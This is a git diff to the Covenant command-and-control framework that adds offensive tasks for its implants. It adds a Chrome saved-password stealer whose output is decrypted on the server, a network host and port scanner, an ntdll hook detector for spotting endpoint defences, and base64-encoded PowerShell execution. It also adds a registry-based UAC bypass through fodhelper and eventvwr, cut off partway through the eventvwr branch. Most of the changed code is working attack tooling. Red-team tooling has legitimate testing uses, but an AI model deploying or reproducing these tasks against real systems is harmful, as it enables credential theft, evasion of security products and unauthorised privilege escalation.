diff --git a/.gitmodules b/.gitmodules
index 6debcc64..3957fa75 100644
--- a/.gitmodules
+++ b/.gitmodules
@@ -30,3 +30,9 @@
path = Covenant/Data/ReferenceSourceLibraries/SharpSC
url = https://github.com/djhohnstein/SharpSC
ignore = dirty
+[submodule "Covenant/Data/ReferenceSourceLibraries/NET-scan"]
+ path = Covenant/Data/ReferenceSourceLibraries/NET-scan
+ url = https://github.com/khraoverflow/NET-scan
+[submodule "Covenant/Data/ReferenceSourceLibraries/ChromeDecryptor"]
+ path = Covenant/Data/ReferenceSourceLibraries/ChromeDecryptor
+ url = https://github.com/khraoverflow/ChromeDecryptor
diff --git a/CHANGELOG.md b/CHANGELOG.md
index 1cf0136c..40932da8 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -149,6 +149,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
- Fixed Docker build Covenant.API project
- Fixed low max file upload size for InputFile component
- Fixed DateTimePicker for KillDate doesn't change via UI
+- Fixed missing DonutCore nuget package
## [v0.6] - 2020-08-04
### Added
diff --git a/Covenant/Components/Grunts/GruntCommandCard.razor b/Covenant/Components/Grunts/GruntCommandCard.razor
index 87c1a7b3..0739d4f0 100644
--- a/Covenant/Components/Grunts/GruntCommandCard.razor
+++ b/Covenant/Components/Grunts/GruntCommandCard.razor
@@ -57,6 +57,23 @@
else if (GruntCommand.GruntTasking.Status == GruntTaskingStatus.Completed)
{Download completed: @if (download != null){@download.FileName}
}
}
+ else if (GruntCommand.GruntTasking != null && GruntCommand.GruntTasking.GruntTask != null && GruntCommand.GruntTasking.GruntTask.Name == "Chrome_passwords")
+ {
+ if (GruntCommand.GruntTasking.Status == GruntTaskingStatus.Progressed)
+ {
+ Decrypting...
+ }
+ else if (GruntCommand.GruntTasking.Status == GruntTaskingStatus.Completed)
+ {
+ DecryptEvent decryptEvent = GetDecryptEvent(GruntCommand).WaitResult();
+ Decrypted : @if (decryptEvent != null)
+ {
+
@decryptEvent.DecryptedOutput
+ }
+
+ }
+ }
+
else if (GruntCommand.CommandOutput != null)
{
@GruntCommand.CommandOutput.Output
@@ -168,7 +185,28 @@
return ev;
}
}
- catch { return null; }
+ catch { return null; }
+ }
+
+ private async Task GetDecryptEvent(GruntCommand command)
+ {
+
+ //try
+ //{
+ // lock (_serviceLock)
+ // {
+ // DecryptEvent ev = Service.GetDecryptEventByGruntCommand(command.Id).WaitResult();
+ // Service.DisposeContext();
+ // return ev;
+ // }
+ //}
+ //catch { return null; }
+
+ DecryptEvent dec = new DecryptEvent();
+
+ dec.EncryptedOutput = command.CommandOutput.Output;
+ dec.Decrypt();
+ return dec;
}
private ScreenshotEvent GetScreenshotEvent(GruntCommand command)
diff --git a/Covenant/Core/CovenantHubService.cs b/Covenant/Core/CovenantHubService.cs
index e2e742f9..561dca8f 100644
--- a/Covenant/Core/CovenantHubService.cs
+++ b/Covenant/Core/CovenantHubService.cs
@@ -259,6 +259,10 @@ public Task CreateScreenshotEvent(ScreenshotEventContent screen
{
return _connection.InvokeAsync("CreateScreenshotEvent", screenshotEvent);
}
+ public Task CreateDecryptEvent(DecryptEventContent decryptEvent)
+ {
+ return _connection.InvokeAsync("CreateDecryptEvent", decryptEvent);
+ }
public Task CreateTicketCredential(CapturedTicketCredential credential)
{
@@ -1085,6 +1089,18 @@ public Task> GetScreenshotEvents()
return _connection.InvokeAsync>("GetScreenshotEvents");
}
+ public Task GetDecryptEvent(int eventId)
+ {
+ return _connection.InvokeAsync("GetDecryptEvent", eventId);
+ }
+
+
+
+ public Task> GetDecryptEvents()
+ {
+ return _connection.InvokeAsync>("GetDecryptEvents");
+ }
+
public Task GetShellCodeLauncher()
{
return _connection.InvokeAsync("GetShellCodeLauncher");
@@ -1234,5 +1250,10 @@ public Task ResetCovenantToFactoryDefault(ClaimsPrincipal principal)
{
return _connection.InvokeAsync("ResetCovenantToFactoryDefault", principal);
}
+
+ public Task GetDecryptEventByGruntCommand(int id)
+ {
+ return _connection.InvokeAsync("GetDecryptEventByGruntCommand", id);
+ }
}
}
\ No newline at end of file
diff --git a/Covenant/Core/CovenantService.cs b/Covenant/Core/CovenantService.cs
index d83e5422..c98f5e93 100644
--- a/Covenant/Core/CovenantService.cs
+++ b/Covenant/Core/CovenantService.cs
@@ -25,6 +25,7 @@
using Covenant.Models.Grunts;
using Covenant.Models.Indicators;
using NLog;
+using Org.BouncyCastle.Crypto;
namespace Covenant.Core
{
@@ -87,6 +88,10 @@ public interface IEventService
Task GetScreenshotEventByGruntCommand(int id);
Task CreateScreenshotEvent(ScreenshotEventContent screenshotEvent);
Task DeleteEvent(int id);
+ Task> GetDecryptEvents();
+ Task GetDecryptEventByGruntCommand(int id);
+ Task GetDecryptEvent(int eventId);
+ Task CreateDecryptEvent(DecryptEventContent decryptEvent);
}
public interface IImplantTemplateService
@@ -1014,6 +1019,61 @@ public async Task CreateScreenshotEvent(ScreenshotEventContent
return await this.GetScreenshotEvent(screenshotEvent.Id);
}
+ public async Task> GetDecryptEvents()
+ {
+
+ return await _context.Events.Where(E => E.Type == EventType.Decrypt).Select(E => (DecryptEvent)E).ToListAsync();
+ }
+
+ public async Task GetDecryptEvent(int eventId)
+ {
+ DecryptEvent anEvent = (DecryptEvent)await _context.Events.FirstOrDefaultAsync(E => E.Id == eventId && E.Type == EventType.Decrypt);
+ if (anEvent == null)
+ {
+ throw new ControllerNotFoundException($"NotFound - DecryptEvent with id: {eventId}");
+ }
+ return anEvent;
+ }
+
+ public async Task GetDecryptEventByGruntCommand(int id)
+ {
+ DecryptEvent anEvent = await _context.Events
+ .Where(E => E.Type == EventType.Decrypt)
+ .Select(E => (DecryptEvent)E)
+ .FirstOrDefaultAsync(E => E.GruntCommandId == id);
+ if (anEvent == null)
+ {
+ throw new ControllerNotFoundException($"NotFound - DecryptEvent with GruntCommandId: {id}");
+ }
+ return anEvent;
+ }
+
+ private async Task CreateDecryptEvent(DecryptEvent DecryptEvent, string contents)
+ {
+ return await this.CreateDecryptEvent(new DecryptEventContent
+ {
+ Name = DecryptEvent.Name,
+ GruntCommandId = DecryptEvent.GruntCommandId,
+ Time = DecryptEvent.Time,
+ MessageHeader = DecryptEvent.MessageHeader,
+ MessageBody = DecryptEvent.MessageBody,
+ Level = DecryptEvent.Level,
+ Context = DecryptEvent.Context,
+ EncryptedOutput = contents
+ });
+ }
+
+ public async Task CreateDecryptEvent(DecryptEventContent decryptEvent)
+ {
+ decryptEvent.Time = DateTime.UtcNow;
+
+ decryptEvent.Decrypt();
+ await _context.Events.AddAsync(decryptEvent);
+ await _context.SaveChangesAsync();
+ await _notifier.NotifyCreateEvent(this, decryptEvent);
+ return await this.GetDecryptEvent(decryptEvent.Id);
+ }
+
public async Task DeleteEvent(int id)
{
Event e = await this.GetEvent(id);
@@ -3187,6 +3247,21 @@ public static string Execute()
Progress = DownloadEvent.DownloadProgress.Portion
}, new byte[] { });
}
+ else if (tasking.GruntTask.Name.Equals("Chrome_passwords", StringComparison.CurrentCultureIgnoreCase))
+ {
+
+ DecryptEvent Decrypt = await this.CreateDecryptEvent(new DecryptEvent
+ {
+ GruntCommandId = tasking.GruntCommandId,
+ // Time = updatingGruntTasking.CompletionTime,
+ MessageHeader = "Getting saved passwords",
+ MessageBody = "Decrypted passwords: " + tasking.GruntCommand.CommandOutput.Output,
+ EncryptedOutput = tasking.GruntCommand.CommandOutput.Output,
+ Level = EventLevel.Info,
+ Context = tasking.Grunt.Name,
+
+ }, "") ;
+ }
tasking.Parameters = parameters;
try
diff --git a/Covenant/Core/DbInitializer.cs b/Covenant/Core/DbInitializer.cs
index 59783ba5..2e37586b 100644
--- a/Covenant/Core/DbInitializer.cs
+++ b/Covenant/Core/DbInitializer.cs
@@ -18,6 +18,8 @@
using Covenant.Models.Covenant;
using Covenant.Models.Listeners;
using Covenant.Models.Grunts;
+using YamlDotNet.Core;
+using Microsoft.AspNetCore.Mvc.ViewComponents;
namespace Covenant.Core
{
@@ -335,6 +337,38 @@ await service.GetReferenceAssemblyByName("System.ServiceProcess.dll", Common.Dot
await service.GetReferenceAssemblyByName("System.ServiceProcess.dll", Common.DotNetVersion.Net40)
},
EmbeddedResources = new List()
+ },
+ new ReferenceSourceLibrary
+ {
+ Name = "NET-scan", Description = "network host and port scanner ",
+ Location = "NET-scan" + Path.DirectorySeparatorChar,
+ CompatibleDotNetVersions = new List{Common.DotNetVersion.Net40,Common.DotNetVersion.Net35},
+ ReferenceAssemblies = new List
+ {
+ await service.GetReferenceAssemblyByName("mscorlib.dll", Common.DotNetVersion.Net35),
+ await service.GetReferenceAssemblyByName("mscorlib.dll", Common.DotNetVersion.Net40),
+ await service.GetReferenceAssemblyByName("System.dll", Common.DotNetVersion.Net35),
+ await service.GetReferenceAssemblyByName("System.dll", Common.DotNetVersion.Net40),
+ await service.GetReferenceAssemblyByName("System.Core.dll", Common.DotNetVersion.Net35),
+ await service.GetReferenceAssemblyByName("System.Core.dll", Common.DotNetVersion.Net40)
+ },
+ EmbeddedResources = new List()
+ },
+ new ReferenceSourceLibrary
+ {
+ Name = "ChromeDecryptor", Description = "Chrome password extrating tool ",
+ Location = "ChromeDecryptor" + Path.DirectorySeparatorChar,
+ CompatibleDotNetVersions = new List{Common.DotNetVersion.Net40,Common.DotNetVersion.Net35},
+ ReferenceAssemblies = new List
+ {
+ await service.GetReferenceAssemblyByName("mscorlib.dll", Common.DotNetVersion.Net35),
+ await service.GetReferenceAssemblyByName("mscorlib.dll", Common.DotNetVersion.Net40),
+ await service.GetReferenceAssemblyByName("System.dll", Common.DotNetVersion.Net35),
+ await service.GetReferenceAssemblyByName("System.dll", Common.DotNetVersion.Net40),
+ await service.GetReferenceAssemblyByName("System.Core.dll", Common.DotNetVersion.Net35),
+ await service.GetReferenceAssemblyByName("System.Core.dll", Common.DotNetVersion.Net40)
+ },
+ EmbeddedResources = new List()
}
};
await service.CreateReferenceSourceLibraries(ReferenceSourceLibraries);
diff --git a/Covenant/Covenant.csproj b/Covenant/Covenant.csproj
index 1c54ddf4..0bd8e781 100644
--- a/Covenant/Covenant.csproj
+++ b/Covenant/Covenant.csproj
@@ -29,6 +29,8 @@
+
+
diff --git a/Covenant/Data/ReferenceSourceLibraries/ChromeDecryptor b/Covenant/Data/ReferenceSourceLibraries/ChromeDecryptor
new file mode 160000
index 00000000..30e4040e
--- /dev/null
+++ b/Covenant/Data/ReferenceSourceLibraries/ChromeDecryptor
@@ -0,0 +1 @@
+Subproject commit 30e4040e062e06d77e3c618d83e07800f23d0ee3
diff --git a/Covenant/Data/ReferenceSourceLibraries/NET-scan b/Covenant/Data/ReferenceSourceLibraries/NET-scan
new file mode 160000
index 00000000..8666bed9
--- /dev/null
+++ b/Covenant/Data/ReferenceSourceLibraries/NET-scan
@@ -0,0 +1 @@
+Subproject commit 8666bed92ad5f075f5ba01fe2ebdbd4d40997da5
diff --git a/Covenant/Data/Tasks/Chrome_passwords.yaml b/Covenant/Data/Tasks/Chrome_passwords.yaml
new file mode 100644
index 00000000..12ab9d29
--- /dev/null
+++ b/Covenant/Data/Tasks/Chrome_passwords.yaml
@@ -0,0 +1,170 @@
+- Name: Chrome_passwords
+ Aliases: []
+ Description: get Chrome stored passwords
+ Author:
+ Name: amine brahmi
+ Handle: khraoverflow
+ Link: https://twitter.com/dr_whoami_
+ Help:
+ Language: CSharp
+ CompatibleDotNetVersions:
+ - Net35
+ - Net40
+ Code: |
+ using System;
+ using System.IO;
+ using System.Reflection;
+ using System.Threading;
+
+ using ChromeDecryptor;
+
+
+ public static class Task
+ {
+ public static Stream OutputStream { get; set; }
+ public static string Execute(string Command)
+ {
+
+
+ try
+ {
+
+ TextWriter realStdOut = Console.Out;
+ TextWriter realStdErr = Console.Error;
+ StreamWriter stdOutWriter = new StreamWriter(OutputStream);
+ StreamWriter stdErrWriter = new StreamWriter(OutputStream);
+ stdOutWriter.AutoFlush = true;
+ stdErrWriter.AutoFlush = true;
+ Console.SetOut(stdOutWriter);
+ Console.SetError(stdErrWriter);
+
+ string[] args = Command.Split(' ');
+ typeof(ChromeDecryptor.Program).GetMethod("Main", BindingFlags.NonPublic | BindingFlags.Static).Invoke(null, new object[] { args });
+
+ Console.Out.Flush();
+ Console.Error.Flush();
+ Console.SetOut(realStdOut);
+ Console.SetError(realStdErr);
+
+ OutputStream.Close();
+ return "";
+ }
+ catch (Exception e)
+ {
+
+ return e.Message;
+ }
+ }
+
+ }
+
+
+ TaskingType: Assembly
+ UnsafeCompile: false
+ TokenTask: false
+ Options:
+ - Name: Command
+ Value: ''
+ DefaultValue: ''
+ Description: path to files
+ SuggestedValues: []
+ Optional: true
+ DisplayInCommand: false
+ FileOption: false
+ ReferenceSourceLibraries:
+ - Name: ChromeDecryptor
+ Description: a .NET assembly to gather saved browser creds
+ Location: ChromeDecryptor\
+ Language: CSharp
+ CompatibleDotNetVersions:
+ - Net35
+ - Net40
+ ReferenceAssemblies:
+ - Name: System.Management.Automation.dll
+ Location: net35\System.Management.Automation.dll
+ DotNetVersion: Net35
+ - Name: System.Management.dll
+ Location: net40\System.Management.dll
+ DotNetVersion: Net40
+ - Name: System.Management.Automation.dll
+ Location: net40\System.Management.Automation.dll
+ DotNetVersion: Net40
+ - Name: System.IdentityModel.dll
+ Location: net40\System.IdentityModel.dll
+ DotNetVersion: Net40
+ - Name: System.dll
+ Location: net40\System.dll
+ DotNetVersion: Net40
+ - Name: System.DirectoryServices.dll
+ Location: net40\System.DirectoryServices.dll
+ DotNetVersion: Net40
+ - Name: System.Core.dll
+ Location: net40\System.Core.dll
+ DotNetVersion: Net40
+ - Name: mscorlib.dll
+ Location: net40\mscorlib.dll
+ DotNetVersion: Net40
+ - Name: System.Management.dll
+ Location: net35\System.Management.dll
+ DotNetVersion: Net35
+ - Name: mscorlib.dll
+ Location: net35\mscorlib.dll
+ DotNetVersion: Net35
+ - Name: System.Core.dll
+ Location: net35\System.Core.dll
+ DotNetVersion: Net35
+ - Name: System.DirectoryServices.dll
+ Location: net35\System.DirectoryServices.dll
+ DotNetVersion: Net35
+ - Name: System.dll
+ Location: net35\System.dll
+ DotNetVersion: Net35
+ - Name: System.IdentityModel.dll
+ Location: net35\System.IdentityModel.dll
+ DotNetVersion: Net35
+ EmbeddedResources: []
+ ReferenceAssemblies:
+ - Name: System.Management.Automation.dll
+ Location: net35\System.Management.Automation.dll
+ DotNetVersion: Net35
+ - Name: System.Management.dll
+ Location: net40\System.Management.dll
+ DotNetVersion: Net40
+ - Name: System.Management.Automation.dll
+ Location: net40\System.Management.Automation.dll
+ DotNetVersion: Net40
+ - Name: System.IdentityModel.dll
+ Location: net40\System.IdentityModel.dll
+ DotNetVersion: Net40
+ - Name: System.dll
+ Location: net40\System.dll
+ DotNetVersion: Net40
+ - Name: System.DirectoryServices.dll
+ Location: net40\System.DirectoryServices.dll
+ DotNetVersion: Net40
+ - Name: System.Core.dll
+ Location: net40\System.Core.dll
+ DotNetVersion: Net40
+ - Name: mscorlib.dll
+ Location: net40\mscorlib.dll
+ DotNetVersion: Net40
+ - Name: System.Management.dll
+ Location: net35\System.Management.dll
+ DotNetVersion: Net35
+ - Name: mscorlib.dll
+ Location: net35\mscorlib.dll
+ DotNetVersion: Net35
+ - Name: System.Core.dll
+ Location: net35\System.Core.dll
+ DotNetVersion: Net35
+ - Name: System.DirectoryServices.dll
+ Location: net35\System.DirectoryServices.dll
+ DotNetVersion: Net35
+ - Name: System.dll
+ Location: net35\System.dll
+ DotNetVersion: Net35
+ - Name: System.IdentityModel.dll
+ Location: net35\System.IdentityModel.dll
+ DotNetVersion: Net35
+ EmbeddedResources: []
+
diff --git a/Covenant/Data/Tasks/HookDetector.yaml b/Covenant/Data/Tasks/HookDetector.yaml
new file mode 100644
index 00000000..3741d78a
--- /dev/null
+++ b/Covenant/Data/Tasks/HookDetector.yaml
@@ -0,0 +1,51 @@
+- Author:
+ Name: amine brahmi
+ Handle: khraoverflow
+ Link: https://twitter.com/dr_whoami_
+ Name: HookDetector
+ Aliases: []
+ Description: gets list of hooked functions
+ Help:
+ Language: CSharp
+ CompatibleDotNetVersions:
+ - Net35
+ - Net40
+ Code: "using System;\nusing System.Diagnostics;\nusing System.Runtime.InteropServices;\nusing System.Linq;\nusing System.Collections.Generic;\n\nclass Task\n{\n static string[] functions =\n {\n \"NtClose\",\n \"NtAllocateVirtualMemory\",\n \"NtAllocateVirtualMemoryEx\",\n \"NtCreateThread\",\n \"NtCreateThreadEx\",\n \"NtCreateUserProcess\",\n \"NtFreeVirtualMemory\",\n \"NtLoadDriver\",\n \"NtMapViewOfSection\",\n \"NtOpenProcess\",\n \"NtProtectVirtualMemory\",\n \"NtQueueApcThread\",\n \"NtQueueApcThreadEx\",\n \"NtResumeThread\",\n \"NtSetContextThread\",\n \"NtSetInformationProcess\",\n \"NtSuspendThread\",\n \"NtUnloadDriver\",\n \"NtWriteVirtualMemory\"\n };\n static byte[] safeBytes = {\n 0x4c, 0x8b, 0xd1, // mov r10, rcx\n 0xb8 // mov eax, ??\n };\n\n static string output = \"\";\n public static string Execute()\n {\n \n if (!GetProcessArch())\n {\n\n output += Environment.NewLine + \"[-] It looks like you're not running x64.\";\n return output;;\n }\n // Get the base address of ntdll.dll in our own process\n IntPtr ntdllBase = GetNTDLLBase();\n if (ntdllBase == IntPtr.Zero)\n {\n output += Environment.NewLine + \"[-] Couldn't get find ntdll.dll\";\n return output;;\n\n }\n else { output += Environment.NewLine + \"NTDLL Base Address: 0x{0:X}\" + ntdllBase.ToInt64(); }\n\n // Get the address of each of the target functions in ntdll.dll\n IDictionary funcAddresses = GetFuncAddress(ntdllBase, functions);\n\n // Check the first DWORD at each function's address for proper SYSCALL setup\n int i = 0; // Used for populating the results array\n bool safe;\n foreach (KeyValuePair func in funcAddresses)\n {\n byte[] instructions = new byte[4];\n Marshal.Copy(func.Value, instructions, 0, 4);\n\n string fmtFunc = string.Format(\" {0,-25} 0x{1:X} \", func.Key, func.Value.ToInt64());\n safe = instructions.SequenceEqual(safeBytes);\n\n if (safe)\n {\n output += Environment.NewLine + fmtFunc + \"- SAFE\";\n }\n else\n {\n byte[] hookInstructions = new byte[32];\n Marshal.Copy(func.Value, hookInstructions, 0, 32);\n output += Environment.NewLine + fmtFunc + \" - HOOK DETECTED\";\n output += Environment.NewLine + \" {0,-25} {1}\" + \"Instructions: \" + BitConverter.ToString(hookInstructions).Replace(\"-\", \" \");\n }\n\n i++;\n }\n return output;\n }\n\n static IntPtr GetNTDLLBase()\n {\n Process hProc = Process.GetCurrentProcess();\n ProcessModule module = hProc.Modules.Cast().SingleOrDefault(m => string.Equals(m.ModuleName, \"ntdll.dll\", StringComparison.OrdinalIgnoreCase));\n return module?.BaseAddress ?? IntPtr.Zero;\n }\n\n static IDictionary GetFuncAddress(IntPtr hModule, string[] functions)\n {\n IDictionary funcAddresses = new Dictionary();\n foreach (string function in functions)\n {\n IntPtr funcPtr = Win32.GetProcAddress(hModule, function);\n if (funcPtr != IntPtr.Zero)\n {\n funcAddresses.Add(function, funcPtr);\n }\n else\n {\n output += Environment.NewLine + \"[-] Couldn't locate the address for {0}! (Error: {1})\"+ function+ Marshal.GetLastWin32Error();\n }\n }\n\n return funcAddresses;\n }\n\n static bool GetProcessArch()\n {\n // Make sure that we're running x64 on x64\n bool wow64;\n Win32.IsWow64Process(Process.GetCurrentProcess().Handle, out wow64);\n\n //if (Environment.Is64BitProcess && !wow64)\n //{\n // return true;\n //}\n //else\n //{\n // return false;\n //}\n return true;\n\n }\n}\n\nclass Win32\n{\n [DllImport(\"kernel32\", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]\n public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);\n\n [DllImport(\"kernel32.dll\", SetLastError = true, CallingConvention = CallingConvention.Winapi)]\n public static extern bool IsWow64Process(IntPtr hProcess, out bool Wow64Process);\n}\n"
+ Compiled: false
+ TaskingType: Assembly
+ ReferenceSourceLibraries: []
+ ReferenceAssemblies:
+ - Name: mscorlib.dll
+ Location: net35\mscorlib.dll
+ DotNetVersion: Net35
+ - Name: System.Core.dll
+ Location: net35\System.Core.dll
+ DotNetVersion: Net35
+ - Name: System.dll
+ Location: net35\System.dll
+ DotNetVersion: Net35
+ - Name: System.Drawing.dll
+ Location: net35\System.Drawing.dll
+ DotNetVersion: Net35
+ - Name: System.Windows.Forms.dll
+ Location: net35\System.Windows.Forms.dll
+ DotNetVersion: Net35
+ - Name: mscorlib.dll
+ Location: net40\mscorlib.dll
+ DotNetVersion: Net40
+ - Name: System.Core.dll
+ Location: net40\System.Core.dll
+ DotNetVersion: Net40
+ - Name: System.dll
+ Location: net40\System.dll
+ DotNetVersion: Net40
+ - Name: System.Drawing.dll
+ Location: net40\System.Drawing.dll
+ DotNetVersion: Net40
+ - Name: System.Windows.Forms.dll
+ Location: net40\System.Windows.Forms.dll
+ DotNetVersion: Net40
+ EmbeddedResources: []
+ UnsafeCompile: false
+ TokenTask: false
+ Options: []
diff --git a/Covenant/Data/Tasks/NET-scan.yaml b/Covenant/Data/Tasks/NET-scan.yaml
new file mode 100644
index 00000000..15b03360
--- /dev/null
+++ b/Covenant/Data/Tasks/NET-scan.yaml
@@ -0,0 +1,168 @@
+- Name: NET-scan
+ Aliases: []
+ Description: Use a NET-scan command.
+ Author:
+ Name: amine brahmi
+ Handle: khraoverflow
+ Link: https://twitter.com/dr_whoami_
+ Help:
+ Language: CSharp
+ CompatibleDotNetVersions:
+ - Net35
+ - Net40
+ Code: |
+ using System;
+ using System.IO;
+ using System.Reflection;
+ using System.Threading;
+
+ using NET_scan;
+
+ public static class Task
+ {
+ public static Stream OutputStream { get; set; }
+ public static string Execute(string Command)
+ {
+ try
+ {
+ TextWriter realStdOut = Console.Out;
+ TextWriter realStdErr = Console.Error;
+ StreamWriter stdOutWriter = new StreamWriter(OutputStream);
+ StreamWriter stdErrWriter = new StreamWriter(OutputStream);
+ stdOutWriter.AutoFlush = true;
+ stdErrWriter.AutoFlush = true;
+ Console.SetOut(stdOutWriter);
+ Console.SetError(stdErrWriter);
+
+ string[] args = Command.Split(' ');
+ typeof(net_scan.Program).GetMethod("Main", BindingFlags.NonPublic | BindingFlags.Static).Invoke(null, new object[] { args });
+
+
+ Console.Out.Flush();
+ Console.Error.Flush();
+ Console.SetOut(realStdOut);
+ Console.SetError(realStdErr);
+
+ OutputStream.Close();
+ return "";
+ }
+ catch (Exception e)
+ {
+ if (OutputStream != null)
+ {
+ OutputStream.Close();
+ }
+ return e.GetType().FullName + ": " + e.Message + Environment.NewLine + e.StackTrace;
+ }
+ }
+ }
+ TaskingType: Assembly
+ UnsafeCompile: false
+ TokenTask: false
+ Options:
+ - Name: Command
+ Value: ''
+ DefaultValue: ''
+ Description: NET-scan command to execute, the command should be inside quotes, followed (optionally) by timeout to wait for output.
+ SuggestedValues:
+ - hosts -r 192.168.1-2.1-254 -p 445
+ - ports -h 192.168.56.1 -p 1000
+ Optional: true
+ DisplayInCommand: true
+ FileOption: false
+ ReferenceSourceLibraries:
+ - Name: NET-scan
+ Description: NET-scan is a .NET assembly to perform host discovery based on a mass port scan , and a port scanner.
+ Location: NET-scan\
+ Language: CSharp
+ CompatibleDotNetVersions:
+ - Net35
+ - Net40
+ ReferenceAssemblies:
+ - Name: System.Management.Automation.dll
+ Location: net35\System.Management.Automation.dll
+ DotNetVersion: Net35
+ - Name: System.Management.dll
+ Location: net40\System.Management.dll
+ DotNetVersion: Net40
+ - Name: System.Management.Automation.dll
+ Location: net40\System.Management.Automation.dll
+ DotNetVersion: Net40
+ - Name: System.IdentityModel.dll
+ Location: net40\System.IdentityModel.dll
+ DotNetVersion: Net40
+ - Name: System.dll
+ Location: net40\System.dll
+ DotNetVersion: Net40
+ - Name: System.DirectoryServices.dll
+ Location: net40\System.DirectoryServices.dll
+ DotNetVersion: Net40
+ - Name: System.Core.dll
+ Location: net40\System.Core.dll
+ DotNetVersion: Net40
+ - Name: mscorlib.dll
+ Location: net40\mscorlib.dll
+ DotNetVersion: Net40
+ - Name: System.Management.dll
+ Location: net35\System.Management.dll
+ DotNetVersion: Net35
+ - Name: mscorlib.dll
+ Location: net35\mscorlib.dll
+ DotNetVersion: Net35
+ - Name: System.Core.dll
+ Location: net35\System.Core.dll
+ DotNetVersion: Net35
+ - Name: System.DirectoryServices.dll
+ Location: net35\System.DirectoryServices.dll
+ DotNetVersion: Net35
+ - Name: System.dll
+ Location: net35\System.dll
+ DotNetVersion: Net35
+ - Name: System.IdentityModel.dll
+ Location: net35\System.IdentityModel.dll
+ DotNetVersion: Net35
+ EmbeddedResources: []
+ ReferenceAssemblies:
+ - Name: System.Management.Automation.dll
+ Location: net35\System.Management.Automation.dll
+ DotNetVersion: Net35
+ - Name: System.Management.dll
+ Location: net40\System.Management.dll
+ DotNetVersion: Net40
+ - Name: System.Management.Automation.dll
+ Location: net40\System.Management.Automation.dll
+ DotNetVersion: Net40
+ - Name: System.IdentityModel.dll
+ Location: net40\System.IdentityModel.dll
+ DotNetVersion: Net40
+ - Name: System.dll
+ Location: net40\System.dll
+ DotNetVersion: Net40
+ - Name: System.DirectoryServices.dll
+ Location: net40\System.DirectoryServices.dll
+ DotNetVersion: Net40
+ - Name: System.Core.dll
+ Location: net40\System.Core.dll
+ DotNetVersion: Net40
+ - Name: mscorlib.dll
+ Location: net40\mscorlib.dll
+ DotNetVersion: Net40
+ - Name: System.Management.dll
+ Location: net35\System.Management.dll
+ DotNetVersion: Net35
+ - Name: mscorlib.dll
+ Location: net35\mscorlib.dll
+ DotNetVersion: Net35
+ - Name: System.Core.dll
+ Location: net35\System.Core.dll
+ DotNetVersion: Net35
+ - Name: System.DirectoryServices.dll
+ Location: net35\System.DirectoryServices.dll
+ DotNetVersion: Net35
+ - Name: System.dll
+ Location: net35\System.dll
+ DotNetVersion: Net35
+ - Name: System.IdentityModel.dll
+ Location: net35\System.IdentityModel.dll
+ DotNetVersion: Net35
+ EmbeddedResources: []
\ No newline at end of file
diff --git a/Covenant/Data/Tasks/SharpSploit.Execution.yaml b/Covenant/Data/Tasks/SharpSploit.Execution.yaml
index 7c27b05b..b9044a50 100644
--- a/Covenant/Data/Tasks/SharpSploit.Execution.yaml
+++ b/Covenant/Data/Tasks/SharpSploit.Execution.yaml
@@ -540,6 +540,7 @@
- Net40
Code: |
using System;
+ using System.Text;
using SharpSploit.Execution;
@@ -549,11 +550,22 @@
{
try
{
- return Shell.PowerShellExecute(PowerShellCommand, true);
+ try
+ {
+ byte[] ByteFromStr = Convert.FromBase64String(PowerShellCommand);
+ PowerShellCommand = Encoding.Unicode.GetString(ByteFromStr);
+ return Shell.PowerShellExecute(PowerShellCommand);
+ }
+ catch(Exception e)
+ {
+ return Shell.PowerShellExecute(PowerShellCommand, true);
+ }
+
}
catch (Exception e) { return e.GetType().FullName + ": " + e.Message + Environment.NewLine + e.StackTrace; }
}
}
+
TaskingType: Assembly
UnsafeCompile: false
TokenTask: false
diff --git a/Covenant/Data/Tasks/UAC_reg_bypass.yaml b/Covenant/Data/Tasks/UAC_reg_bypass.yaml
new file mode 100644
index 00000000..b4867c7f
--- /dev/null
+++ b/Covenant/Data/Tasks/UAC_reg_bypass.yaml
@@ -0,0 +1,145 @@
+- Name: UAC_reg_bypass
+ Aliases: []
+ Description: uac bypass with eventvwr or fodhelper
+ Author:
+ Name: amine brahmi
+ Handle: khraoverflow
+ Link: https://twitter.com/dr_whoami_
+ Help:
+ Language: CSharp
+ CompatibleDotNetVersions:
+ - Net35
+ - Net40
+ Code: |
+ using System;
+ using Microsoft.Win32;
+ using System.Threading;
+ using System.Diagnostics;
+
+ public static class Task
+ {
+ public static string Execute(string registryKey, string command)
+ {
+ try
+ {
+ RegistryKey alwaysNotify = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System");
+ string consentPrompt = alwaysNotify.GetValue("ConsentPromptBehaviorAdmin").ToString();
+ string secureDesktopPrompt = alwaysNotify.GetValue("PromptOnSecureDesktop").ToString();
+ alwaysNotify.Close();
+
+ if (consentPrompt == "2" & secureDesktopPrompt == "1")
+ {
+ return "UAC is set to Always Notify. Not performing UAC bypass.";
+ }
+ }
+ catch (Exception e) { return e.GetType().FullName + ": " + e.Message + Environment.NewLine + e.StackTrace; }
+
+ if (registryKey.ToLower() == "fodhelper")
+ {
+ try
+ {
+ RegistryKey newkey = Registry.CurrentUser.OpenSubKey(@"Software\Classes\", true);
+ newkey.CreateSubKey(@"ms-settings\Shell\Open\command");
+
+ RegistryKey fod = Registry.CurrentUser.OpenSubKey(@"Software\Classes\ms-settings\Shell\Open\command", true);
+ fod.SetValue("DelegateExecute", "");
+ fod.SetValue("", command);
+ fod.Close();
+
+ Process p = new Process();
+ p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
+ p.StartInfo.FileName = "C:\\windows\\system32\\fodhelper.exe";
+ p.Start();
+
+ Thread.Sleep(10000);
+
+ newkey.DeleteSubKeyTree("ms-settings");
+ return "Fodhelper UAC bypass executed";
+ }
+ catch (Exception e) { return e.GetType().FullName + ": " + e.Message + Environment.NewLine + e.StackTrace; }
+ }
+ else if (registryKey.ToLower() == "eventvwr")
+ {
+ try
+ {
+ RegistryKey newkey = Registry.CurrentUser.OpenSubKey(@"Software\Classes\", true);
+ newkey.CreateSubKey(@"mscfile\Shell\Open\command");
+
+ RegistryKey vwr = Registry.CurrentUser.OpenSubKey(@"Software\Classes\mscfile\Shell\Open\command", true);
+ vwr.SetValue("", command);
+ vwr.Close();
+
+ Process p = new Process();
+ p.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
